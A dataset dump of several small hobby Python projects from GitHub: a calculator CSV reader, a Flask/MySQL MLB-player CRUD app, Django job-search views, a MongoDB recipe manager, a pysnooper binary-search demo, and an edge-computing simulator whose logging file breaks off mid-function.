metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jinhongtan/Calculator",
"score": 3
} |
#### File: Calculator/src/read_data.py
```python
import pandas as pd
from Calculator import *
#AddictionPath = 'C:\Users\<NAME>\PycharmProjects\Calculator\venv\UnitTestAddition.csv'
basePath = "/code/src/"
AdditionPath = basePath + "data/UnitTestAddition.csv"
SubtractionPath = basePath + "data/UnitTestSubtraction.csv"
MultiplicationPath = basePath + "data/UnitTestMultiplication.csv"
SquareRootPath = basePath + "data/UnitTestSquareRoot.csv"
SquarePath = basePath + "data/UnitTestSquare.csv"
DivisionPath = basePath + "data/UnitTestDivision.csv"
def read_data(TestDataPath):
data= pd.read_csv(TestDataPath)
df = pd.DataFrame(data, columns=['Value 1','Value 2','Result'])
return df
def read_square(TestDataPath):
data= pd.read_csv(TestDataPath)
df = pd.DataFrame(data, columns=['Value 1','Result'])
return df
``` |
{
"source": "jinhongtan/is601Final",
"score": 3
} |
#### File: is601Final/app/app.py
```python
import simplejson as json
from flask import Flask, request, Response, redirect, url_for
from flask import render_template
from flaskext.mysql import MySQL
from pymysql.cursors import DictCursor
from forms import SignupForm
app = Flask(__name__,
template_folder="templates",
static_folder="static",
static_url_path='')
mysql = MySQL(cursorclass=DictCursor)
app.config.from_object('config.Config')
@app.route('/', methods=['GET'])
def index():
user = {'username': 'Michael'}
cursor = mysql.get_db().cursor()
cursor.execute('SELECT * FROM mlbPlayers')
result = cursor.fetchall()
return render_template('index.html', title='Home', user=user, players=result)
@app.route('/view/<int:player_id>', methods=['GET'])
def record_view(player_id):
cursor = mysql.get_db().cursor()
cursor.execute('SELECT * FROM mlbPlayers WHERE id=%s', player_id)
result = cursor.fetchall()
return render_template('view.html', title='View Form', player=result[0])
@app.route('/edit/<int:player_id>', methods=['GET'])
def form_edit_get(player_id):
cursor = mysql.get_db().cursor()
cursor.execute('SELECT * FROM mlbPlayers WHERE id=%s', player_id)
result = cursor.fetchall()
return render_template('edit.html', title='Edit Form', player=result[0])
@app.route('/edit/<int:player_id>', methods=['POST'])
def form_update_post(player_id):
cursor = mysql.get_db().cursor()
inputData = (request.form.get('plName'), request.form.get('plTeam'), request.form.get('plPosition'),
request.form.get('plHeight'), request.form.get('plWeight'),
request.form.get('plAge'), player_id)
sql_update_query = """UPDATE mlbPlayers t SET t.plName = %s, t.plTeam = %s, t.plPosition = %s, t.plHeight =
%s, t.plWeight = %s, t.plAge = %s WHERE t.id = %s """
cursor.execute(sql_update_query, inputData)
mysql.get_db().commit()
return redirect("/", code=302)
@app.route('/player/new', methods=['GET'])
def form_insert_get():
return render_template('new.html', title='New MLB Player Form')
@app.route('/player/new', methods=['POST'])
def form_insert_post():
cursor = mysql.get_db().cursor()
inputData = (request.form.get('plName'), request.form.get('plTeam'), request.form.get('plPosition'),
request.form.get('plHeight'), request.form.get('plWeight'),
request.form.get('plAge'))
sql_insert_query = """INSERT INTO mlbPlayers (plName,plTeam, plPosition, plHeight, plWeight,
plAge) VALUES (%s,%s, %s,%s, %s,%s)"""
cursor.execute(sql_insert_query, inputData)
mysql.get_db().commit()
return redirect("/", code=302)
@app.route('/delete/<int:player_id>', methods=['POST'])
def form_delete_post(player_id):
cursor = mysql.get_db().cursor()
sql_delete_query = """DELETE FROM mlbPlayers WHERE id = %s """
cursor.execute(sql_delete_query, player_id)
mysql.get_db().commit()
return redirect("/", code=302)
@app.route('/api/v1/players', methods=['GET'])
def api_browse() -> str:
cursor = mysql.get_db().cursor()
cursor.execute('SELECT * FROM mlbPlayers')
result = cursor.fetchall()
json_result = json.dumps(result)
resp = Response(json_result, status=200, mimetype='application/json')
return resp
@app.route('/api/v1/players/<int:player_id>', methods=['GET'])
def api_retrieve(player_id) -> str:
cursor = mysql.get_db().cursor()
cursor.execute('SELECT * FROM mlbPlayers WHERE id=%s', player_id)
result = cursor.fetchall()
json_result = json.dumps(result)
resp = Response(json_result, status=200, mimetype='application/json')
return resp
@app.route('/api/v1/players/<int:player_id>', methods=['PUT'])
def api_edit(player_id) -> str:
cursor = mysql.get_db().cursor()
content = request.json
inputData = (content['plName'], content['plTeam'], content['plPosition'],
content['plHeight'], content['plWeight'],
content['plAge'], player_id)
sql_update_query = """UPDATE mlbPlayers t SET t.plName = %s, t.plTeam = %s, t.plPosition = %s, t.plHeight =
%s, t.plWeight = %s, t.plAge = %s WHERE t.id = %s """
cursor.execute(sql_update_query, inputData)
mysql.get_db().commit()
resp = Response(status=200, mimetype='application/json')
return resp
@app.route('/api/v1/players', methods=['POST'])
def api_add() -> str:
content = request.json
cursor = mysql.get_db().cursor()
inputData = (content['plName'], content['plTeam'], content['plPosition'],
content['plHeight'], content['plWeight'],
content['plAge'])
sql_insert_query = """INSERT INTO mlbPlayers (plName,plTeam, plPosition, plHeight, plWeight,
plAge) VALUES (%s,%s, %s,%s, %s,%s) """
cursor.execute(sql_insert_query, inputData)
mysql.get_db().commit()
resp = Response(status=201, mimetype='application/json')
return resp
@app.route('/api/v1/players/<int:player_id>', methods=['DELETE'])
def api_delete(player_id) -> str:
cursor = mysql.get_db().cursor()
sql_delete_query = """DELETE FROM mlbPlayers WHERE id = %s """
cursor.execute(sql_delete_query, player_id)
mysql.get_db().commit()
resp = Response(status=200, mimetype='application/json')
return resp
@app.route('/signup', methods=['GET', 'POST'])
def signup_page():
return render_template(
'/signup.html',
title='Create an Account | Flask-Login Tutorial.',
form=SignupForm(),
template='signup-page',
body="Sign up for a user account."
)
@app.route("/signin")
def dashboard():
# This had to serve a static page b/c of how tutorial made the route
return redirect('/dashboard.html')
@app.route("/login")
def login():
return redirect(url_for('dashboard'))
@app.errorhandler(404)
def not_found(arg):
"""Page not found."""
return render_template('404.html', title='404 error.', message='Page Not Found')
@app.errorhandler(400)
def bad_request():
"""Bad request."""
return render_template('400.html', title='400 error.', message='Bad request. Page Not Found')
@app.errorhandler(500)
def server_error(arg):
"""Internal server error."""
return render_template('500.html', message='Server Error')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000, debug=True)
``` |
{
"source": "jinhongtan/jobtest",
"score": 2
} |
#### File: jobtest/ResumeSearch/views.py
```python
from django.shortcuts import render, redirect
from django.db import models
from django import forms
from . import models
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from django.conf import settings
from django.core.mail import send_mail as sm
app_name = "ResumeSearch"
from django.contrib.auth.decorators import login_required
import datetime
from . models import user, industry, skill, job
from .forms import UserForm, RegisterForm
import hashlib
from itsdangerous import SignatureExpired
from django.http import HttpResponse, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from urllib.parse import unquote
from django.urls import reverse
from django.core import serializers
def hash_code(s, salt='ResumeSearch'):
h = hashlib.sha256()
s += salt
h.update(s.encode())
return h.hexdigest()
def login(request):
if request.session.get('is_login', None):
return redirect('/index')
if request.method == "POST":
login_form = UserForm(request.POST)
if login_form.is_valid():
username = request.POST.get('username')
password = request.POST.get('password')
if username and password: # 确保用户名和密码都不为空
username = username.strip()
# 用户名字符合法性验证
# 密码长度验证
# 更多的其它验证.....
try:
user = models.user.objects.get(name=username)
if user.password == hash_code(password):
request.session['is_login'] = True
request.session['user_id'] = user.id
request.session['user_name'] = user.name
return redirect(reverse('index'))
#return render(request, "index.html", {'username':username})
else:
message = "Password incorrect !"
except:
message = 'user not exit'
#return render(request, 'index.html')
login_form = UserForm
return render(request, 'login.html', locals())
def register(request):
if request.session.get('is_login', None):
# 登录状态不允许注册。你可以修改这条原则!
return redirect("/index/")
if request.method == "POST":
register_form = RegisterForm(request.POST)
message = "请检查填写的内容!"
if register_form.is_valid(): # 获取数据
username = register_form.cleaned_data['username']
password1 = register_form.cleaned_data['password1']
password2 = register_form.cleaned_data['password2']
email = register_form.cleaned_data['email']
if password1 != password2: # 判断两次密码是否相同
message = "两次输入的密码不同!"
return render(request, 'register.html', locals())
else:
same_name_user = models.user.objects.filter(name=username)
if same_name_user: # 用户名唯一
message = '用户已经存在,请重新选择用户名!'
return render(request, 'register.html', locals())
same_email_user = models.User.objects.filter(email=email)
if same_email_user: # 邮箱地址唯一
message = '该邮箱地址已被注册,请使用别的邮箱!'
return render(request, 'register.html', locals())
# 当一切都OK的情况下,创建新用户
new_user = models.user.objects.create()
new_user.name = username
new_user.password = <PASSWORD>)
new_user.email = email
new_user.save()
return redirect('/login/') # 自动跳转到登录页面
register_form = RegisterForm()
return render(request, 'register.html', locals())
def logout(request):
if not request.session.get('is_login', None):
# 如果本来就未登录,也就没有登出一说
return redirect("/index/")
request.session.flush()
# 或者使用下面的方法
# del request.session['is_login']
# del request.session['user_id']
# del request.session['user_name']
return redirect("/index/")
def test_ajax(request):
# res = {"code": 101, "msg": "请求无效"}
# # 判断是否为ajax请求, 不是返回请求无效
# if request.is_ajax():
# try:
# res["code"] = 100
# res["msg"] = '请求成功'
# except Exception:
# res["msg"] = '请求无效'
#return HttpResponse("res")
if request.method == 'POST':
Job = request.POST.get("job")
Mainjob = request.POST.get("mainjob")
Input = request.POST.get("input")
text='this is text'
print(Mainjob.split('/'))
#link = request.get_full_path()
#print(link)
#job = request.GET.get('job', '')
#mainjob = request.GET.get('mainjob','')
#city=request.GET.get('city','')
print("This is Job:"+Job)
print("This is Mainjob:" +Mainjob)
print("This is input:" + Input)
message={}
jobs = job.objects.filter(title__icontains=Input)
data = serializers.serialize("json", jobs)
jsonjobs = {'jobs': data}
#jobs = job.objects.filter(title__icontains=keyword, location__icontains=city)
return JsonResponse(jsonjobs)
def index(request):
#if request.session.get('is_login', None):
jobs = job.objects.all()
return render(request, 'index.html', {'jobs': jobs, "register": "注册", "login": "登入"})
#else:
#return render(request, 'index.html')
def detail(request, slug):
jobs = job.objects.get(slug=slug)
return render(request, 'details.html', {'jobs': jobs})
def search_job(request):
if request.is_ajax():
#link = request.get_full_path()
#print(link)
job = request.POST.get('job', '')
mainjob = request.POST.get('mainjob', '')
input = request.POST.get('input', '')
#city=request.GET.get('city','')
print(job)
print(mainjob)
print(input)
jobs = job.objects.filter(title__icontains=job)
#jobs = job.objects.filter(title__icontains=keyword, location__icontains=city)
return render(request, 'index.html', {'jobs': jobs})
``` |
{
"source": "jinhopark8345/ICC",
"score": 3
} |
#### File: icc/iccdb/db_manage.py
```python
from pymongo import MongoClient
from iccjson.jconnect import validate_json, get_schema
from iccjson.jconnect import make_temp_ing_info, make_temp_user_ing, make_temp_recipe
class IccDB:
"""
DB class for Icc
"""
def __init__(self, db_name):
self.client = MongoClient()
self.db = self.client[db_name]
self.user_ing = self.db.user_ing
self.recipe = self.db.recipe
self.ing_info = self.db.ing_info
def add_ing_info(self, ing_info):
"""add ing to ing_info
Args:
ing: ingredient to be added to user_ing
ing_example = {"onion", "fridge", "1440"}
Returns:
-1: invalid schema
-2: ing_info already exist in the DB
"""
# check if the format is correct
ing_info_schema = get_schema("ing_info")
if not validate_json(ing_info, ing_info_schema):
# temporary sol, need to change
return -1
# check if the ingredient exists on db already
if self.ing_info.find_one({"name": ing_info["name"]}) is None:
return self.ing_info.insert_one(ing_info)
else:
# ingredient already exist
print("add_ing_info error: {}, already exist".format(ing_info))
return -2
def update_ing_info(self, ing):
pass
def delete_ing_info(self, ing_name):
return self.ing_info.delete_many({"name": ing_name})
def add_user_ing(self, user_ing):
# check if the format is correct
user_info_schema = get_schema("user_ing")
if not validate_json(user_ing, user_info_schema):
# temporary sol, need to change
return -1
# check if the ingredient exists on db already
if self.user_ing.find_one({"name": user_ing["name"]}) is None:
return self.user_ing.insert_one(user_ing)
else:
# ingredient already exist
return -2
def add_temp_user_ing(self):
# clean db
self.db.drop_collection("user_ing")
user_ings = make_temp_user_ing()
for user_ing in user_ings:
# print(recipe)
rtv = self.add_user_ing(user_ing)
if rtv in (-1, -2):
print("add_recipe error code : {}".format(rtv))
def update_user_ing(self, ing):
"""update user_ing quantity if user has the ing,
if not, then add the whole ing to user_ing
Args:
ing: ingredient to be added to user_ing
ing_example = {"onion", 600, "g", "2020-10-07 13:34"}
Returns:
"""
# https://docs.mongodb.com/manual/reference/operator/update/
# $inc is update operators
# The *upsert* option can be used to create the document if it
# doesn't already exist. when ingredient is updated, _id doesn't
# get added to the ingredient
if (self.user_ing.find_one_and_update(
{"name": ing["name"]},
{"$inc": {
"quantity": ing["quantity"]
}},
upsert=False,
) is None):
# since find_one_and_update doesn't add other properties
# than name and quantity, should insert whole new
# ingreident to user_ing
self.user_ing.insert_one(ing)
def print_user_ing(self):
for ing in self.user_ing.find({}):
print(ing)
def delete_user_ing(self, ing_name):
self.user_ing.delete_one({"name": ing_name})
def add_recipe(self, recipe):
"""add recipe to db.recipe
Args:
recipe: ingredient to be added to user_ing
ing_example = {"onion", "fridge", "1440"}
Returns:
-1 : output is an integer -1, when the format does not match the specific
schema.
-2 : output is an integer -2, when recipe to add already exist in dbMongo
of recpies.
"recipe" : output is recipe to add. type is dict
"""
recipe_schema = get_schema("recipe")
if not validate_json(recipe, recipe_schema):
# temporary sol, need to change
return -1
# check if the recipe exists on db already
if self.recipe.find_one({"name": recipe["name"]}) is None:
return self.recipe.insert_one(recipe)
# recipe already exist
else:
return -2
def delete_recipe(self, recipe_name):
return self.recipe.delete_many({"name": recipe_name})
def replace_recipe_ings(self, recipe):
""" replace existing ing in recipe with new ing.
Args:
recipe: type is dict. It include recpie_name, like, ings_name,
ings_quantity_unit, ings_quantity.
recipe_example :
{
"name":
"rice cake soup",
"like":
7,
"ings": [{
"name": "green onion",
"quantity": 500,
"quantity_unit": "g"
}]
}
Returns:
"""
return self.recipe.find_one_and_update({"name": recipe["name"]},
{"$set": {
"ings": recipe["ings"]
}},
upsert=False)
def replace_recipe_like(self, recipe):
""" replace existing like in recipe with new like.
Args:
replace existing ing in recipe with new ing.
Returns:
"""
return self.recipe.find_one_and_update({"name": recipe["name"]},
{"$set": {
"like": recipe["like"]
}},
upsert=False)
def update_recipe_like(self, recipe_name, like=1, replace_flag=False):
"""update value of like in recipe when replace_flag is False.
when replace_flag is True, replace value of like in recipe with value of like as args.
Args:
recipe_name: type is string.
like: type is integer.
replace_flag: Optional;
Returns:
"""
recipe = self.find_recipe(recipe_name)
if not replace_flag:
# like
recipe["like"] += like
# replace the like value
else:
recipe["like"] = like
self.replace_recipe_like(recipe)
def add_recipe_ing(self, recipe_name, ing):
"""add ing in ings of recipe to db.recipe
Args:
recipe_name: type is string.
ing: type is dict. ingredient to be added to ing in recipe.
ing_example = {"onion", "fridge", "1440"}
Returns:
"""
recipe = self.find_recipe(recipe_name)
### Next SAIDS: need to add schema test
recipe["ings"].append(ing)
self.replace_recipe_ings(recipe)
def delete_recipe_ing(self, recipe_name, ing_name):
"""delete ing in ings of recipe to db.recipe
Args:
recipe_name: type is string.
ing_name: type is string. ingredient to be deleted to ing in ings of recipe.
Returns:
"""
recipe = self.find_recipe(recipe_name)
recipe["ings"] = [ing for ing in recipe["ings"] if ing["name"] != ing_name]
self.replace_recipe_ings(recipe)
def update_recipe_ing(self, recipe_name, ing, replace_flag=False):
"""update value of ing_quantity in ing of recipe when replace_flag is False.
when replace_flag is True, replace value of ing_quantity in ing of recipe with value of ing as args.
Args:
recipe_name: type is string.
ing: type is dict.
replace_flag: Optional;
Return:
"""
recipe = self.find_recipe(recipe_name)
for db_ing in recipe["ings"]:
if db_ing["name"] == ing["name"]:
if not replace_flag:
db_ing["quantity"] += ing["quantity"]
else:
db_ing["quantity"] = ing["quantity"]
self.replace_recipe_ings(recipe)
def find_ing_info(self, ing_name):
"""find ing_info in db.ing_info
Args:
ing_name: type is string.
Returns:
ing_info: type is dict.
"""
ing = self.ing_info.find_one({"name": ing_name})
# return None if ing doesn't exist on DB
return ing
def find_user_ing(self, ing_name, return_id=True):
"""find user_ing in db.user_ing.
if returnID is True,print ID. else, not print ID.
Args:
ing_name: type is string.
returnID: optional;
Returns:
ing: type is dict.
"""
if return_id is False:
# find_one will find the object and return the object with id(default)
ing = self.user_ing.find_one({"name": ing_name}, {"_id": False})
return ing
else:
ing = self.user_ing.find_one({"name": ing_name})
return ing
def find_recipe(self, recipe_name, return_id=True):
"""find recipe in db.recipe.
if returnID is True, print ID. else, not print ID.
Args:
recipe_name: type is string.
returnID: optional;
Returns:
recipe: type is dict.
"""
if return_id is False:
# find_one will find the object and return the object with id(default)
recipe = self.recipe.find_one({"name": recipe_name}, {"_id": False})
return recipe
else:
recipe = self.recipe.find_one({"name": recipe_name})
return recipe
def find_recipes(self, return_id=True):
"""find all recipes in db.recipe.
if returnID is True, print ID. else, not print ID.
Args:
returnID: optional;
Returns:
recipe: type is dict.
"""
cursor = self.recipe # choosing the collection you need
recipes = []
if return_id is False:
for recipe in cursor.find({}, {"_id": False}):
recipes.append(recipe)
else:
for recipe in cursor.find({}):
recipes.append(recipe)
return recipes
def find_recipe_ing(self, recipe_name, ing_name, return_id=True):
"""find ing of recipe in db.recipe.
if returnID is True, print ID. else, not print ID.
Args:
returnID: optional;
Returns:
ing: type is dict.
"""
if return_id is False:
# find_one will find the object and return the object with id(default)
recipe = self.recipe.find_one({"name": recipe_name}, {"_id": False})
for ing in recipe["ings"]:
if ing["name"] == ing_name:
return ing
else:
recipe = self.recipe.find_one({"name": recipe_name})
for ing in recipe["ings"]:
if ing["name"] == ing_name:
return ing
def find_user_ings(self, return_id=True):
"""find all user_ings in db.user_ing.
if returnID is True, print ID. else, not print ID.
Args:
returnID: optional;
Returns:
ing_info: tpye is dict.
"""
user_ings = []
if return_id is False:
for user_ing in self.user_ing.find({}, {"_id": False}):
user_ings.append(user_ing)
else:
for user_ing in self.user_ing.find({}):
user_ings.append(user_ing)
return user_ings
def find_ing_infos(self, return_id=False):
"""find all ing_infos in db.ing_info.
if returnID is True, print ID. else, not print ID.
Args:
returnID: optional;
Returns:
ing_info: tpye is dict.
"""
ing_infos = []
if return_id is False:
for ing_info in self.ing_info.find({}, {"_id": False}):
ing_infos.append(ing_info)
else:
for ing_info in self.ing_info.find({}):
ing_infos.append(ing_info)
return ing_infos
def add_temp_recipe(self):
self.db.drop_collection("recipe")
recipes = make_temp_recipe()
for recipe in recipes:
# print(recipe)
temp = self.add_recipe(recipe)
if temp in (-1, -2):
print("add_recipe error code : {}", temp)
def add_temp_ing_info(self):
# clean db
self.db.drop_collection("ing_info")
ing_infos = make_temp_ing_info()
for ing_info in ing_infos:
# print(recipe)
rtv = self.add_ing_info(ing_info)
if rtv in (-1, -2):
print("add_recipe error code : {}".format(rtv))
```
#### File: ICC/icc/main.py
```python
from flask import Flask, render_template
app = Flask(__name__)
from iccjson.jconnect import *
from recommend.compare_recipe import *
from recommend.recommend_recipe import *
from iccdb.db_manage import *
from gui.main_gui import *
def main_t():
icc_db = IccDB("icc")
icc_db.add_temp_recipe()
icc_db.add_temp_user_ing()
icc_db.add_temp_ing_info()
recommended_recipe = recommed_recipe()
print("you should make {}".format(recommended_recipe))
app = ICC_GUI()
# print("before user ings {}".format(icc_db.find_user_ings(returnID=False)))
# remove_recipe_ing_from_user_ing(recommended_recipe)
# print("after user ings {}".format(icc_db.find_user_ings(returnID=False)))
# remove_recipe_ing_from_user_ing(recommended_recipe)
# print("after user ings {}".format(icc_db.find_user_ings(returnID=False)))
pass
# main_t()
# import tkinter as tk
# class IccGUI(tk.Frame):
# def __init__(self, master=None):
# super().__init__(master)
# self.master = master
# self.pack()
# self.create_widgets()
# def create_widgets(self):
# self.hi_there = tk.Button(self)
# self.hi_there["text"] = "Hello World\n(click me)"
# self.hi_there["command"] = self.say_hi
# self.hi_there.pack(side="top")
# self.quit = tk.Button(self, text="QUIT", fg="red",
# command=self.master.destroy)
# self.quit.pack(side="bottom")
# def say_hi(self):
# print("hi there, everyone!")
# root = tk.Tk()
# app = IccGUI(master=root)
# app.mainloop()
@app.route('/hello/')
@app.route('/hello/<name>')
def hello(name=None):
icc_db = IccDB("icc")
icc_db.add_temp_recipe()
icc_db.add_temp_user_ing()
icc_db.add_temp_ing_info()
recommended_recipe = recommed_recipe()
print("you should make {}".format(recommended_recipe))
ing_info = icc_db.find_ing_infos()
print(ing_info)
# client = MongoClient()
# db = client["icc"]
# temp = db.user_ing.find({})
# print(temp)
return render_template('index.html', data=ing_info)
if __name__ == '__main__':
app.run(port=5000)
# export FLASK_APP=main.py
# flask run
```
#### File: jinhopark8345/ICC/setup.py
```python
import os
import sys
import inspect
import platform
import threading
# ROOT_DIR = None
# def setup():
# main_id = None
# for t in threading.enumerate():
# if t.name == 'MainThread':
# main_id = t.ident
# break
# if not main_id:
# raise RuntimeError("Main thread exited before execution")
# current_main_frame = sys._current_frames()[main_id]
# base_frame = inspect.getouterframes(current_main_frame)[-1]
# if platform.system() == 'Windows':
# filename = base_frame.filename
# else:
# filename = base_frame[0].f_code.co_filename
# global ROOT_DIR
# ROOT_DIR = os.path.dirname(os.path.abspath(filename))
``` |
{
"source": "jinhopark8345/pysnooper-study",
"score": 3
} |
#### File: jinhopark8345/pysnooper-study/pysnooper-binary-search-example.py
```python
import pysnooper
import random
import logging
import threading
import time
from typing import List
def thread_function(name):
logging.info("Thread %s: starting", name)
time.sleep(2)
logging.info("Thread %s: finishing", name)
class Solution:
# @pysnooper.snoop(thread_info=True)
@pysnooper.snoop(thread_info=True)
def binary_search(self, nums: List[int], target:int) -> int:
left, right = 0, len(nums) -1
while left <= right:
mid = left + (right - left)
midnum = nums[mid]
if midnum == target:
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt="%H:%M:%S")
# logging.info("Main : before creating thread")
x = threading.Thread(target=thread_function, args=(1,))
# logging.info("Main : before running thread")
x.start()
# logging.info("Main : wait for the thread to finish")
# x.join()
# logging.info("Main : all done")
x.join()
return mid
elif midnum < target:
left = mid + 1
else:
right = mid - 1
return -1
Solution().binary_search([1,2,3,4,5], 2)
``` |
{
"source": "jinho-park/ECOS",
"score": 2
} |
#### File: ECOS/ecos/edge.py
```python
from ecos.log import Log
from ecos.simulator import Simulator
from ecos.event import Event
class Edge:
def __init__(self, id, props, policy, time):
self.CPU = props["mips"]
self.id = id
self.policy = policy
self.exec_list = list()
self.finish_list = list()
self.waiting_list = list()
self.previous_time = time
def get_policy(self):
return self.policy
def get_edge_id(self):
return self.id
def task_processing(self, task):
# calculate available resource
resourceUsage = 0
for task in self.exec_list:
resourceUsage += task.get_allocated_resource()
if self.CPU - resourceUsage > 0:
requiredResource = task.get_remain_size() / task.get_task_deadline()
task.set_allocated_resource(requiredResource)
self.exec_list.append(task)
msg = {
"task": "check",
"detail": {
"node": "edge",
"id": self.id
}
}
event = Event(msg, None, task.get_task_deadline())
Simulator.get_instance().send_event(event)
else:
self.waiting_list.append(task)
def update_task_state(self, simulationTime):
timeSpen = simulationTime - self.previous_time
for task in self.exec_list:
allocatedResource = task.get_allocated_resource()
remainSize = task.get_remain_size() - (allocatedResource * timeSpen)
task.set_remain_size(remainSize)
task.set_finish_node(1)
if len(self.exec_list) == 0 and len(self.waiting_list) == 0:
self.previous_time = simulationTime
for task in self.exec_list:
if task.get_remain_size() <= 0:
self.exec_list.remove(task)
self.finish_list.append(task)
self.finish_task(task)
if len(self.waiting_list) > 0:
resourceUsage = 0
for task in self.exec_list:
resourceUsage += task.get_allocated_resource()
for task in self.waiting_list:
if resourceUsage <= 0:
break
requiredResource = task.get_remain_size() / task.get_task_deadline()
if requiredResource > resourceUsage:
break
task.set_allocated_resource(requiredResource)
task.set_buffering_time(Simulator.get_instance().get_clock(), 1)
resourceUsage -= requiredResource
self.exec_list.append(task)
self.waiting_list.remove(task)
# add event
nextEvent = 99999999999999
for task in self.exec_list:
remainingLength = task.get_remain_size()
estimatedFinishTime = (remainingLength / task.get_allocated_resource())
if estimatedFinishTime < 1:
estimatedFinishTime = 1
if estimatedFinishTime < nextEvent:
nextEvent = estimatedFinishTime
msg = {
"task": "check",
"detail": {
"node": "edge",
"id": self.id
}
}
event = Event(msg, None, nextEvent)
Simulator.get_instance().send_event(event)
def finish_task(self, task):
# 1 means edge node
task.set_finish_node(1)
task.set_processing_time(Simulator.get_instance().get_clock(), 1)
task.set_end_time(Simulator.get_instance().get_clock())
Log.get_instance().record_log(task)
self.finish_list.remove(task)
```
#### File: ECOS/ecos/event.py
```python
class Event:
def __init__(self, msg, task, time):
self.msg = msg
self.task = task
self.time = time
def get_message(self):
return self.msg
def get_task(self):
return self.task
def get_time(self):
return self.time
def update_time(self, _time):
self.time = _time
```
#### File: ECOS/ecos/log.py
```python
import json
import numpy as np
from enum import Enum
class Log:
_instance = None
@classmethod
def get_instance(cls):
if not cls._instance:
cls._instance = Log()
return cls._instance
def __init__(self):
# 2: Mobile, 1: Edge, 0: Cloud
self.device_type = {
"mobile": 2,
"edge": 1,
"cloud": 0
}
# lan: mobile-edge, man: edge-edge, wan: edge-cloud
# 0: gsm, 1: wan, 2: man, 3: lan
self.network_type = {
"lan": 1,
"man": 2,
"wan": 3
}
self.file_enable = True
self.file_name = ""
self.folder_path = ""
self.num_of_task_type = 0
self.completed_task = 0
self.completed_task_cloud = 0
self.completed_task_edge = 0
self.completed_task_mobile = 0
self.success_task = 0
self.network_delay = list()
self.network_delay_gsm = list()
self.network_delay_wan = list()
self.network_delay_man = list()
self.network_delay_lan = list()
self.service_time = list()
self.processing_time = list()
self.processing_time_cloud = list()
self.processing_time_edge = list()
self.processing_time_mobile = list()
self.buffering_time = list()
self.buffering_time_cloud = list()
self.buffering_time_edge = list()
self.buffering_time_mobile = list()
def get_service_time(self):
return self.service_time
def get_completed_task(self):
return self.completed_task
def sim_start(self, name):
# self.folder_path = file
self.file_name = name
def sim_stop(self):
if self.file_enable:
completed_task_sum = self.completed_task
completed_task_cloud_sum = self.completed_task_cloud
completed_task_edge_sum = self.completed_task_edge
completed_task_mobile_sum = self.completed_task_mobile
network_delay_avg = np.divide(sum(self.network_delay), len(self.network_delay),
out=np.zeros_like(sum(self.network_delay)),
where=len(self.network_delay) != 0,
casting="unsafe")
network_delay_gsm_avg = np.divide(sum(self.network_delay_gsm), len(self.network_delay_gsm),
out=np.zeros_like(sum(self.network_delay_gsm)),
where=len(self.network_delay_gsm),
casting="unsafe")
network_delay_wan_avg = np.divide(sum(self.network_delay_wan), len(self.network_delay_wan),
out=np.zeros_like(sum(self.network_delay_wan)),
where=len(self.network_delay_wan), casting="unsafe")
network_delay_man_avg = np.divide(sum(self.network_delay_man), len(self.network_delay_man),
out=np.zeros_like(sum(self.network_delay_man)),
where=len(self.network_delay_man), casting="unsafe")
network_delay_lan_avg = np.divide(sum(self.network_delay_lan), len(self.network_delay_lan),
out=np.zeros_like(sum(self.network_delay_lan)),
where=len(self.network_delay_lan), casting="unsafe")
service_time_avg = np.divide(sum(self.service_time), len(self.service_time),
out=np.zeros_like(sum(self.service_time)),
where=len(self.service_time), casting="unsafe")
processing_time_avg = np.divide(sum(self.processing_time), len(self.processing_time),
out=np.zeros_like(sum(self.processing_time)),
where=len(self.processing_time), casting="unsafe")
processing_time_cloud_avg = np.divide(sum(self.processing_time_cloud), len(self.processing_time_cloud),
out=np.zeros_like(sum(self.processing_time_cloud)),
where=len(self.processing_time_cloud), casting="unsafe")
processing_time_edge_avg = np.divide(sum(self.processing_time_edge), len(self.processing_time_edge),
out=np.zeros_like(sum(self.processing_time_edge)),
where=len(self.processing_time_edge), casting="unsafe")
processing_time_mobile_avg = np.divide(sum(self.processing_time_mobile), len(self.processing_time_mobile),
out=np.zeros_like(sum(self.processing_time_mobile)),
where=len(self.processing_time_mobile), casting="unsafe")
buffering_time_avg = np.divide(sum(self.buffering_time), len(self.buffering_time),
out=np.zeros_like(sum(self.buffering_time)),
where=len(self.buffering_time), casting="unsafe")
buffering_time_cloud_avg = np.divide(sum(self.buffering_time_cloud), len(self.buffering_time_cloud),
out=np.zeros_like(sum(self.buffering_time_cloud)),
where=len(self.buffering_time_cloud), casting="unsafe")
buffering_time_edge_avg = np.divide(sum(self.buffering_time_edge), len(self.buffering_time_edge),
out=np.zeros_like(sum(self.buffering_time_edge)),
where=len(self.buffering_time_edge), casting="unsafe")
buffering_time_mobile_avg = np.divide(sum(self.buffering_time_mobile), len(self.buffering_time_mobile),
out=np.zeros_like(sum(self.buffering_time_mobile)),
where=len(self.buffering_time_mobile), casting="unsafe")
result = {
"completed_task": {
"total_completed_task": completed_task_sum,
"completed_task_cloud" : completed_task_cloud_sum,
"completed_task_edge": completed_task_edge_sum,
"completed_task_mobile": completed_task_mobile_sum
},
"service_time" : service_time_avg.tolist(),
"processing_delay": {
"processing_time" : processing_time_avg.tolist(),
"processing_time_cloud_avg": processing_time_cloud_avg.tolist(),
"processing_time_edge_avg": processing_time_edge_avg.tolist(),
"processing_time_mobile_avg": processing_time_mobile_avg.tolist()
},
"network_delay": {
"network_time": network_delay_avg.tolist(),
"network_delay_gsm": network_delay_gsm_avg.tolist(),
"network_delay_wan": network_delay_wan_avg.tolist(),
"network_delay_man": network_delay_man_avg.tolist(),
"network_delay_lan": network_delay_lan_avg.tolist(),
},
"buffering_delay": {
"buffering_time": buffering_time_avg.tolist(),
"buffering_time_cloud": buffering_time_cloud_avg.tolist(),
"buffering_time_edge": buffering_time_edge_avg.tolist(),
"buffering_time_mobile": buffering_time_mobile_avg.tolist()
}
}
with open(self.file_name, 'w', encoding="utf-8") as make_file:
json.dump(result, make_file, ensure_ascii=False, indent="\n")
def task_end(self, task):
self.record_log(task)
def record_log(self, task):
# type = task.get_task_type()
# processing time
self.processing_time_cloud.append(task.get_processing_time(self.device_type["cloud"]))
self.processing_time_edge.append(task.get_processing_time(self.device_type["edge"]))
self.processing_time_mobile.append(task.get_processing_time(self.device_type["mobile"]))
processing_time = task.get_processing_time_sum()
self.processing_time.append(processing_time)
# buffering time
self.buffering_time_cloud.append((task.get_buffering_time(self.device_type["cloud"])))
